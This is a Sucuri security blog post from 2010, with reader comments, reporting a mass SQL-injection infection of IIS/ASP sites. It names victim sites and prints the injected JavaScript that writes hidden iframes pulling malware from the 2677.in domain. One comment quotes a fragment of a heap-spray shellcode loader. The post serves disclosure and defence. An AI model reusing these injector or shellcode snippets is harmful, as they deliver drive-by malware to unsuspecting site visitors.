• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Mass infection of IIS/ASP sites – 2677.in/yahoo.js

June 11, 2010David Dede

0
SHARES
FacebookTwitterSubscribe

A large number of sites have been hacked again in the last few hours with a malware script pointing to http://2677.in/yahoo.js . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few days ago.

Some of the sites hacked this time:

http://www.ameristar.com/
http://www.servicewomen.org
http://www.chicagopublicradio.org
http://www.industryweek.com
http://www.booksellerandpublisher.com.au
http://www.spain-holiday.com

This time Google says that around 1 thousand pages have been infected. This is the content of the yahoo.js script:

try{__m}catch(e){__m=1;document.title=document.title.replace(/<(w|W)*> /,””);document.write(“< iframe src=http://2677.in/cnzz.html width=0 height==>
<iframe src=http://2677.in/ie.html width=22 height=1

So it loads malware from http://2677.in/ie.html, which then calls http://s11.cnzz.com to load the virus. This is the output of our scan agaisnt ameristar.com:

What is funny is that one of the top pages that got hacked was https://www.idera.com and their seminar about “Understanding SQL Server Security Options”. Just search on Google for “”http://2677.in/yahoo.js” inurl:.idera.com” to see it.

If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

0
SHARES
FacebookTwitterSubscribe

Categories: Website Malware Infections, Website SecurityTags: Hacked Websites, Server Security

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. ashcrow

    June 11, 2010

    Don't forget it's pulling of ie.html as well which seems to be attempting shellcode and also embeds a hidden anhey.swf.

    From the 'sun' div:
    """
    ….
    var a = new Array();
    var xcode=loader("log.txt","MM","NN")*262144;
    var shellcode=loader("log.txt","XX","YY");
    var ls = xcode-(shellcode.length*2 0x01020);
    var b = loader("log.txt","VV","WW");
    while(b.length<ls)
    {
    b =b;
    }
    var lh=b.substring(0,ls/2);
    delete b;
    lh = lh shellcode;
    ….
    """

  2. ashcrow

    June 11, 2010

    anhey.swf is caught by 2 antivirus packages as a generic trojan: https://www.virustotal.com/analisis/725f0cc85e341… …

  3. @dont

    June 12, 2010

    Had the registrar suspend the domain name ~ 5 hrs ago.

  4. spenser

    June 13, 2010

    This is exactly why sites that force javascript on visitors is exactly the wrong thing to do.

    When online banking users are forced to adopt loose security settings to do the simplest of tasks, then eventually they become the default, and that’s when things go wrong.

    Security conscious sites should *not* let their developers run amok demanding ever greater browser permissions. Instead, they should be looking at opportunities to work with less browser permissions.

  5. jj

    June 13, 2010

    Since the Idera pages are httpS, they will pass right through any firewalls, proxy servers and unified threat management gateways that do not perform man-in-the-middle SSL interception. That leaves just the desktop AV to defend corporate networks and we all know how weak of a defense they are.

  6. @contentonist

    June 14, 2010

    found a new website that appears to host the same script;

    4589DOTin/yahoo.js

  7. Test

    June 15, 2010

    What is the 3rd party app installed that is vulnerable to SQL injection? That is, what vulnerability in the sites is allowing malicious users to inject the malware to begin with?

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.